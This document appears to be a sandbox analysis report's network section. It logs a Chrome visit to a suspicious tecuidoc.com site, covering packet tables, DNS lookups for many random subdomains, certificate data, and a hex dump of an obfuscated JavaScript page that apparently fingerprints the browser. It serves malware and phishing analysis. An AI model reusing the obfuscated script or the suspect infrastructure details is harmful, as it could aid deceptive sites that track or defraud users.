                                              Apr 26, 2024 16:57:40.424474955 CEST44349782198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:40.560247898 CEST44349783198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:40.560266972 CEST44349783198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:40.560401917 CEST49783443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:40.560410023 CEST44349783198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:40.560480118 CEST49783443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:40.561089993 CEST49783443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:40.561124086 CEST44349783198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:40.824145079 CEST44349781198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:40.824162960 CEST44349781198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:40.824220896 CEST49781443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:40.824255943 CEST44349781198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:40.824285030 CEST44349781198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:40.824331045 CEST49781443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:40.825066090 CEST49781443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:40.825083017 CEST44349781198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:41.037667990 CEST44349785198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:41.088362932 CEST49785443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:41.143234015 CEST44349785198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:41.143596888 CEST44349785198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:41.143657923 CEST49785443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:41.143739939 CEST49785443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:41.143755913 CEST44349785198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:41.172658920 CEST44349784198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:41.172688007 CEST44349784198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:41.172739029 CEST49784443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:41.172759056 CEST44349784198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:41.172842979 CEST44349784198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:41.172892094 CEST49784443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:41.173301935 CEST49784443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:41.173316002 CEST44349784198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:42.287486076 CEST49786443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:42.287487030 CEST49787443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:42.287575960 CEST44349786198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:42.287584066 CEST44349787198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:42.287600994 CEST49788443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:42.287623882 CEST44349788198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:42.287656069 CEST49786443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:42.287683964 CEST49788443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:42.287693977 CEST49787443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:42.288062096 CEST49788443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:42.288070917 CEST49786443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:42.288077116 CEST44349788198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:42.288124084 CEST44349786198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:42.288321018 CEST49787443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:42.288357019 CEST44349787198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:42.615294933 CEST44349788198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:42.615576029 CEST49788443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:42.615586996 CEST44349788198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:42.615907907 CEST44349787198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:42.616136074 CEST49787443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:42.616163969 CEST44349787198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:42.616626978 CEST44349786198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:42.616647959 CEST44349788198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:42.616722107 CEST49788443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:42.616941929 CEST49786443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:42.616982937 CEST44349786198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:42.617141962 CEST49788443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:42.617208004 CEST44349788198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:42.617217064 CEST49788443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:42.617443085 CEST44349787198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:42.617518902 CEST49787443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:42.617861032 CEST49787443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:42.617861986 CEST49787443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:42.617877960 CEST44349787198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:42.617934942 CEST44349787198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:42.619735956 CEST44349786198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:42.619827986 CEST49786443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:42.620039940 CEST49786443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:42.620248079 CEST49786443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:42.620275974 CEST44349786198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:42.620662928 CEST44349786198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:42.664115906 CEST44349788198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:42.666484118 CEST49786443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:42.666486979 CEST49787443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:42.666506052 CEST44349786198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:42.666531086 CEST44349787198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:42.666570902 CEST49788443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:42.666599989 CEST44349788198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:57:42.713349104 CEST49786443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:42.713350058 CEST49788443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:57:42.713355064 CEST49787443192.168.2.6198.58.99.33
                                              TimestampSource PortDest PortSource IPDest IP
                                              Apr 26, 2024 16:56:13.192766905 CEST53618631.1.1.1192.168.2.6
                                              Apr 26, 2024 16:56:13.205626011 CEST53500311.1.1.1192.168.2.6
                                              Apr 26, 2024 16:56:15.461729050 CEST6319053192.168.2.61.1.1.1
                                              Apr 26, 2024 16:56:15.475801945 CEST5290353192.168.2.61.1.1.1
                                              Apr 26, 2024 16:56:15.617443085 CEST53631921.1.1.1192.168.2.6
                                              Apr 26, 2024 16:56:15.645801067 CEST53631901.1.1.1192.168.2.6
                                              Apr 26, 2024 16:56:15.645937920 CEST53529031.1.1.1192.168.2.6
                                              Apr 26, 2024 16:56:17.384342909 CEST6318653192.168.2.61.1.1.1
                                              Apr 26, 2024 16:56:17.386483908 CEST5030153192.168.2.61.1.1.1
                                              Apr 26, 2024 16:56:17.510812998 CEST53631861.1.1.1192.168.2.6
                                              Apr 26, 2024 16:56:17.511668921 CEST53503011.1.1.1192.168.2.6
                                              Apr 26, 2024 16:56:30.117703915 CEST6271053192.168.2.61.1.1.1
                                              Apr 26, 2024 16:56:30.118048906 CEST5611953192.168.2.61.1.1.1
                                              Apr 26, 2024 16:56:30.250566006 CEST53561191.1.1.1192.168.2.6
                                              Apr 26, 2024 16:56:30.280124903 CEST53627101.1.1.1192.168.2.6
                                              Apr 26, 2024 16:56:38.260045052 CEST6339953192.168.2.61.1.1.1
                                              Apr 26, 2024 16:56:38.261203051 CEST6071253192.168.2.61.1.1.1
                                              Apr 26, 2024 16:56:38.388739109 CEST53535321.1.1.1192.168.2.6
                                              Apr 26, 2024 16:56:38.394558907 CEST53607121.1.1.1192.168.2.6
                                              Apr 26, 2024 16:56:38.447185040 CEST53633991.1.1.1192.168.2.6
                                              Apr 26, 2024 16:56:39.191622019 CEST4951053192.168.2.61.1.1.1
                                              Apr 26, 2024 16:56:39.191770077 CEST5956553192.168.2.61.1.1.1
                                              Apr 26, 2024 16:56:39.319524050 CEST53595651.1.1.1192.168.2.6
                                              Apr 26, 2024 16:56:39.320059061 CEST53495101.1.1.1192.168.2.6
                                              Apr 26, 2024 16:56:43.087824106 CEST5661453192.168.2.61.1.1.1
                                              Apr 26, 2024 16:56:43.088131905 CEST5659853192.168.2.61.1.1.1
                                              Apr 26, 2024 16:56:43.268445015 CEST53565981.1.1.1192.168.2.6
                                              Apr 26, 2024 16:56:43.281889915 CEST53566141.1.1.1192.168.2.6
                                              Apr 26, 2024 16:56:44.047055006 CEST6514653192.168.2.61.1.1.1
                                              Apr 26, 2024 16:56:44.047333002 CEST5591153192.168.2.61.1.1.1
                                              Apr 26, 2024 16:56:44.177630901 CEST53651461.1.1.1192.168.2.6
                                              Apr 26, 2024 16:56:44.209887028 CEST53559111.1.1.1192.168.2.6
                                              Apr 26, 2024 16:56:48.850723982 CEST53596291.1.1.1192.168.2.6
                                              Apr 26, 2024 16:56:51.347939968 CEST5188053192.168.2.61.1.1.1
                                              Apr 26, 2024 16:56:51.348304987 CEST6159453192.168.2.61.1.1.1
                                              Apr 26, 2024 16:56:51.475281954 CEST53518801.1.1.1192.168.2.6
                                              Apr 26, 2024 16:56:51.476572037 CEST53615941.1.1.1192.168.2.6
                                              Apr 26, 2024 16:56:57.379245043 CEST53503521.1.1.1192.168.2.6
                                              Apr 26, 2024 16:57:08.153578043 CEST6095553192.168.2.61.1.1.1
                                              Apr 26, 2024 16:57:08.153831005 CEST5558253192.168.2.61.1.1.1
                                              Apr 26, 2024 16:57:08.282133102 CEST53609551.1.1.1192.168.2.6
                                              Apr 26, 2024 16:57:08.284171104 CEST53555821.1.1.1192.168.2.6
                                              Apr 26, 2024 16:57:12.699079990 CEST53635141.1.1.1192.168.2.6
                                              Apr 26, 2024 16:57:19.080188990 CEST5961053192.168.2.61.1.1.1
                                              Apr 26, 2024 16:57:19.081274986 CEST5452553192.168.2.61.1.1.1
                                              Apr 26, 2024 16:57:19.207817078 CEST53545251.1.1.1192.168.2.6
                                              Apr 26, 2024 16:57:19.207833052 CEST53596101.1.1.1192.168.2.6
                                              Apr 26, 2024 16:57:19.211523056 CEST5003253192.168.2.61.1.1.1
                                              Apr 26, 2024 16:57:19.211898088 CEST5186853192.168.2.61.1.1.1
                                              Apr 26, 2024 16:57:19.212385893 CEST6200353192.168.2.61.1.1.1
                                              Apr 26, 2024 16:57:19.212385893 CEST5009953192.168.2.61.1.1.1
                                              Apr 26, 2024 16:57:19.212626934 CEST5203753192.168.2.61.1.1.1
                                              Apr 26, 2024 16:57:19.212882042 CEST5678853192.168.2.61.1.1.1
                                              Apr 26, 2024 16:57:19.338242054 CEST53500321.1.1.1192.168.2.6
                                              Apr 26, 2024 16:57:19.339339972 CEST53518681.1.1.1192.168.2.6
                                              Apr 26, 2024 16:57:19.340220928 CEST53500991.1.1.1192.168.2.6
                                              Apr 26, 2024 16:57:19.340316057 CEST53620031.1.1.1192.168.2.6
                                              Apr 26, 2024 16:57:19.340358019 CEST53567881.1.1.1192.168.2.6
                                              Apr 26, 2024 16:57:19.340521097 CEST53520371.1.1.1192.168.2.6
                                              Apr 26, 2024 16:57:21.126137972 CEST53603981.1.1.1192.168.2.6
                                              Apr 26, 2024 16:57:27.349216938 CEST5469853192.168.2.61.1.1.1
                                              Apr 26, 2024 16:57:27.349584103 CEST5691653192.168.2.61.1.1.1
                                              Apr 26, 2024 16:57:27.478296995 CEST53546981.1.1.1192.168.2.6
                                              Apr 26, 2024 16:57:27.478370905 CEST53569161.1.1.1192.168.2.6
                                              Apr 26, 2024 16:57:42.158164024 CEST5287853192.168.2.61.1.1.1
                                              Apr 26, 2024 16:57:42.158562899 CEST6456153192.168.2.61.1.1.1
                                              Apr 26, 2024 16:57:42.285903931 CEST53645611.1.1.1192.168.2.6
                                              Apr 26, 2024 16:57:42.286969900 CEST53528781.1.1.1192.168.2.6
                                              Apr 26, 2024 16:57:42.731354952 CEST53541121.1.1.1192.168.2.6
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Apr 26, 2024 16:56:15.461729050 CEST192.168.2.61.1.1.10x6614Standard query (0)srmcorp.tecuidoc.comA (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:56:15.475801945 CEST192.168.2.61.1.1.10xa782Standard query (0)srmcorp.tecuidoc.com65IN (0x0001)false
                                              Apr 26, 2024 16:56:17.384342909 CEST192.168.2.61.1.1.10xcbd5Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:56:17.386483908 CEST192.168.2.61.1.1.10x9388Standard query (0)www.google.com65IN (0x0001)false
                                              Apr 26, 2024 16:56:30.117703915 CEST192.168.2.61.1.1.10x55c3Standard query (0)eccd3fea-7d4f53f3.tecuidoc.comA (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:56:30.118048906 CEST192.168.2.61.1.1.10x4c5fStandard query (0)eccd3fea-7d4f53f3.tecuidoc.com65IN (0x0001)false
                                              Apr 26, 2024 16:56:38.260045052 CEST192.168.2.61.1.1.10xf20fStandard query (0)7457d826-7d4f53f3.tecuidoc.comA (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:56:38.261203051 CEST192.168.2.61.1.1.10xf86Standard query (0)7457d826-7d4f53f3.tecuidoc.com65IN (0x0001)false
                                              Apr 26, 2024 16:56:39.191622019 CEST192.168.2.61.1.1.10xf16eStandard query (0)7e55e394-7d4f53f3.tecuidoc.comA (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:56:39.191770077 CEST192.168.2.61.1.1.10xd74aStandard query (0)7e55e394-7d4f53f3.tecuidoc.com65IN (0x0001)false
                                              Apr 26, 2024 16:56:43.087824106 CEST192.168.2.61.1.1.10x1495Standard query (0)l1ve.tecuidoc.comA (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:56:43.088131905 CEST192.168.2.61.1.1.10xbb09Standard query (0)l1ve.tecuidoc.com65IN (0x0001)false
                                              Apr 26, 2024 16:56:44.047055006 CEST192.168.2.61.1.1.10x98beStandard query (0)0a413710-7d4f53f3.tecuidoc.comA (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:56:44.047333002 CEST192.168.2.61.1.1.10x4433Standard query (0)0a413710-7d4f53f3.tecuidoc.com65IN (0x0001)false
                                              Apr 26, 2024 16:56:51.347939968 CEST192.168.2.61.1.1.10xe6e0Standard query (0)7e55e394-7d4f53f3.tecuidoc.comA (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:56:51.348304987 CEST192.168.2.61.1.1.10xbb34Standard query (0)7e55e394-7d4f53f3.tecuidoc.com65IN (0x0001)false
                                              Apr 26, 2024 16:57:08.153578043 CEST192.168.2.61.1.1.10x2fb2Standard query (0)signup.tecuidoc.comA (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:57:08.153831005 CEST192.168.2.61.1.1.10x74a1Standard query (0)signup.tecuidoc.com65IN (0x0001)false
                                              Apr 26, 2024 16:57:19.080188990 CEST192.168.2.61.1.1.10xae6bStandard query (0)bd6a002d-7d4f53f3.tecuidoc.comA (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:57:19.081274986 CEST192.168.2.61.1.1.10xc4bcStandard query (0)bd6a002d-7d4f53f3.tecuidoc.com65IN (0x0001)false
                                              Apr 26, 2024 16:57:19.211523056 CEST192.168.2.61.1.1.10xc36cStandard query (0)a0d99ec0-7d4f53f3.tecuidoc.comA (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:57:19.211898088 CEST192.168.2.61.1.1.10x944aStandard query (0)a0d99ec0-7d4f53f3.tecuidoc.com65IN (0x0001)false
                                              Apr 26, 2024 16:57:19.212385893 CEST192.168.2.61.1.1.10x3388Standard query (0)a4a4d19d-7d4f53f3.tecuidoc.comA (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:57:19.212385893 CEST192.168.2.61.1.1.10xe3a2Standard query (0)a4a4d19d-7d4f53f3.tecuidoc.com65IN (0x0001)false
                                              Apr 26, 2024 16:57:19.212626934 CEST192.168.2.61.1.1.10x22e4Standard query (0)30e9fbb5-7d4f53f3.tecuidoc.comA (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:57:19.212882042 CEST192.168.2.61.1.1.10x407eStandard query (0)30e9fbb5-7d4f53f3.tecuidoc.com65IN (0x0001)false
                                              Apr 26, 2024 16:57:27.349216938 CEST192.168.2.61.1.1.10x7618Standard query (0)bd6a002d-7d4f53f3.tecuidoc.comA (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:57:27.349584103 CEST192.168.2.61.1.1.10xa2efStandard query (0)bd6a002d-7d4f53f3.tecuidoc.com65IN (0x0001)false
                                              Apr 26, 2024 16:57:42.158164024 CEST192.168.2.61.1.1.10x52c1Standard query (0)signup.tecuidoc.comA (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:57:42.158562899 CEST192.168.2.61.1.1.10x8002Standard query (0)signup.tecuidoc.com65IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Apr 26, 2024 16:56:15.645801067 CEST1.1.1.1192.168.2.60x6614No error (0)srmcorp.tecuidoc.com198.58.99.33A (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:56:17.510812998 CEST1.1.1.1192.168.2.60xcbd5No error (0)www.google.com142.250.217.196A (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:56:17.511668921 CEST1.1.1.1192.168.2.60x9388No error (0)www.google.com65IN (0x0001)false
                                              Apr 26, 2024 16:56:28.202318907 CEST1.1.1.1192.168.2.60x4bfdNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:56:28.202318907 CEST1.1.1.1192.168.2.60x4bfdNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:56:28.685458899 CEST1.1.1.1192.168.2.60x8bceNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                              Apr 26, 2024 16:56:28.685458899 CEST1.1.1.1192.168.2.60x8bceNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:56:30.280124903 CEST1.1.1.1192.168.2.60x55c3No error (0)eccd3fea-7d4f53f3.tecuidoc.com198.58.99.33A (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:56:38.447185040 CEST1.1.1.1192.168.2.60xf20fNo error (0)7457d826-7d4f53f3.tecuidoc.com198.58.99.33A (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:56:39.320059061 CEST1.1.1.1192.168.2.60xf16eNo error (0)7e55e394-7d4f53f3.tecuidoc.com198.58.99.33A (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:56:41.664482117 CEST1.1.1.1192.168.2.60xcdb7No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                              Apr 26, 2024 16:56:41.664482117 CEST1.1.1.1192.168.2.60xcdb7No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:56:43.281889915 CEST1.1.1.1192.168.2.60x1495No error (0)l1ve.tecuidoc.com198.58.99.33A (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:56:44.177630901 CEST1.1.1.1192.168.2.60x98beNo error (0)0a413710-7d4f53f3.tecuidoc.com198.58.99.33A (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:56:51.475281954 CEST1.1.1.1192.168.2.60xe6e0No error (0)7e55e394-7d4f53f3.tecuidoc.com198.58.99.33A (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:57:08.282133102 CEST1.1.1.1192.168.2.60x2fb2No error (0)signup.tecuidoc.com198.58.99.33A (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:57:13.363240004 CEST1.1.1.1192.168.2.60x86bcNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                              Apr 26, 2024 16:57:13.363240004 CEST1.1.1.1192.168.2.60x86bcNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:57:19.207833052 CEST1.1.1.1192.168.2.60xae6bNo error (0)bd6a002d-7d4f53f3.tecuidoc.com198.58.99.33A (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:57:19.338242054 CEST1.1.1.1192.168.2.60xc36cNo error (0)a0d99ec0-7d4f53f3.tecuidoc.com198.58.99.33A (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:57:19.340316057 CEST1.1.1.1192.168.2.60x3388No error (0)a4a4d19d-7d4f53f3.tecuidoc.com198.58.99.33A (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:57:19.340521097 CEST1.1.1.1192.168.2.60x22e4No error (0)30e9fbb5-7d4f53f3.tecuidoc.com198.58.99.33A (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:57:27.101063967 CEST1.1.1.1192.168.2.60x781dNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                              Apr 26, 2024 16:57:27.101063967 CEST1.1.1.1192.168.2.60x781dNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:57:27.478296995 CEST1.1.1.1192.168.2.60x7618No error (0)bd6a002d-7d4f53f3.tecuidoc.com198.58.99.33A (IP address)IN (0x0001)false
                                              Apr 26, 2024 16:57:42.286969900 CEST1.1.1.1192.168.2.60x52c1No error (0)signup.tecuidoc.com198.58.99.33A (IP address)IN (0x0001)false
                                              • srmcorp.tecuidoc.com
                                              • https:
                                                • eccd3fea-7d4f53f3.tecuidoc.com
                                                • 7e55e394-7d4f53f3.tecuidoc.com
                                                • l1ve.tecuidoc.com
                                                • 0a413710-7d4f53f3.tecuidoc.com
                                                • bd6a002d-7d4f53f3.tecuidoc.com
                                                • signup.tecuidoc.com
                                              • fs.microsoft.com
                                              • 7457d826-7d4f53f3.tecuidoc.com
                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                              Apr 26, 2024 16:56:26.188872099 CEST173.222.162.64443192.168.2.649698CN=r.bing.com, O=Microsoft Corporation, L=Redmond, ST=WA, C=US CN=Microsoft Azure ECC TLS Issuing CA 05, O=Microsoft Corporation, C=USCN=Microsoft Azure ECC TLS Issuing CA 05, O=Microsoft Corporation, C=US CN=DigiCert Global Root G3, OU=www.digicert.com, O=DigiCert Inc, C=USWed Oct 18 22:32:40 CEST 2023 Wed Aug 12 02:00:00 CEST 2020Fri Jun 28 01:59:59 CEST 2024 Fri Jun 28 01:59:59 CEST 2024771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-16-23-65281,29-23-24,028a2c9bd18a11de089ef85a160da29e4
                                              CN=Microsoft Azure ECC TLS Issuing CA 05, O=Microsoft Corporation, C=USCN=DigiCert Global Root G3, OU=www.digicert.com, O=DigiCert Inc, C=USWed Aug 12 02:00:00 CEST 2020Fri Jun 28 01:59:59 CEST 2024
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.649707198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:56:15 UTC673OUTGET /?PSZlk=ViP HTTP/1.1
                                              Host: srmcorp.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              sec-ch-ua-platform: "Windows"
                                              Upgrade-Insecure-Requests: 1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: navigate
                                              Sec-Fetch-User: ?1
                                              Sec-Fetch-Dest: document
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-04-26 14:56:17 UTC181INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:56:17 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              2024-04-26 14:56:17 UTC16203INData Raw: 37 37 66 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 66 75 6e 63 74 69 6f 6e 20 61 30 79 28 71 2c 4f 29 7b 76 61 72 20 43 3d 61 30 54 28 29 3b 72 65 74 75 72 6e 20 61 30 79 3d 66 75 6e 63 74 69 6f 6e 28 46 2c 54 29 7b 46 3d 46 2d 30 78 31 61 36 3b 76 61 72 20 79 3d 43 5b 46 5d 3b 72 65 74 75 72 6e 20 79 3b 7d 2c 61 30 79 28 71 2c 4f 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 61 30 54 28 29 7b 76 61 72 20 72 41 3d 5b 27 63 6c 61 73 73 4c 69 73 74 27 2c 27 27 2c 27 27 2c 27 77 68 69 74 65 53 70 61 63 65 27 2c 27 5a 70 54 4b 43 27 2c 27 68 61 73 4f 77 6e 50 72 6f 70 65
                                              Data Ascii: 77f6<!DOCTYPE html><html lang="en"> <head> <script type="text/javascript"> function a0y(q,O){var C=a0T();return a0y=function(F,T){F=F-0x1a6;var y=C[F];return y;},a0y(q,O);}function a0T(){var rA=['classList','','','whiteSpace','ZpTKC','hasOwnPrope
                                              2024-04-26 14:56:17 UTC14515INData Raw: 63 74 6f 72 27 2c 27 69 6e 64 65 78 27 2c 27 64 69 76 5b 63 6c 61 73 73 5e 3d 5c 78 32 32 61 70 70 5f 67 64 70 72 5c 78 32 32 5d 27 2c 27 49 53 5f 49 54 45 52 41 54 4f 52 27 2c 27 75 73 65 72 41 67 65 6e 74 27 2c 27 6f 66 66 73 65 74 50 61 72 65 6e 74 27 2c 27 74 6f 53 74 72 69 6e 67 27 2c 27 6a 6f 69 6e 27 2c 27 70 65 72 6d 69 73 73 69 6f 6e 27 2c 27 27 2c 27 52 54 43 50 65 65 72 43 6f 6e 6e 65 63 74 69 6f 6e 49 63 65 45 76 65 6e 74 27 2c 27 44 4f 4d 52 65 63 74 4c 69 73 74 27 2c 27 7a 6f 6f 6d 27 2c 27 6e 6f 2d 70 72 65 66 65 72 65 6e 63 65 27 2c 27 31 32 4b 75 4f 63 4d 6c 27 2c 27 66 61 69 6c 27 2c 27 76 6b 4e 78 43 27 2c 27 70 61 67 65 58 4f 66 66 73 65 74 27 2c 27 32 30 33 30 37 35 61 43 57 59 41 53 27 2c 27 4c 65 74 74 65 72 5c 78 32 30 47 6f 74 68
                                              Data Ascii: ctor','index','div[class^=\x22app_gdpr\x22]','IS_ITERATOR','userAgent','offsetParent','toString','join','permission','','RTCPeerConnectionIceEvent','DOMRectList','zoom','no-preference','12KuOcMl','fail','vkNxC','pageXOffset','203075aCWYAS','Letter\x20Goth
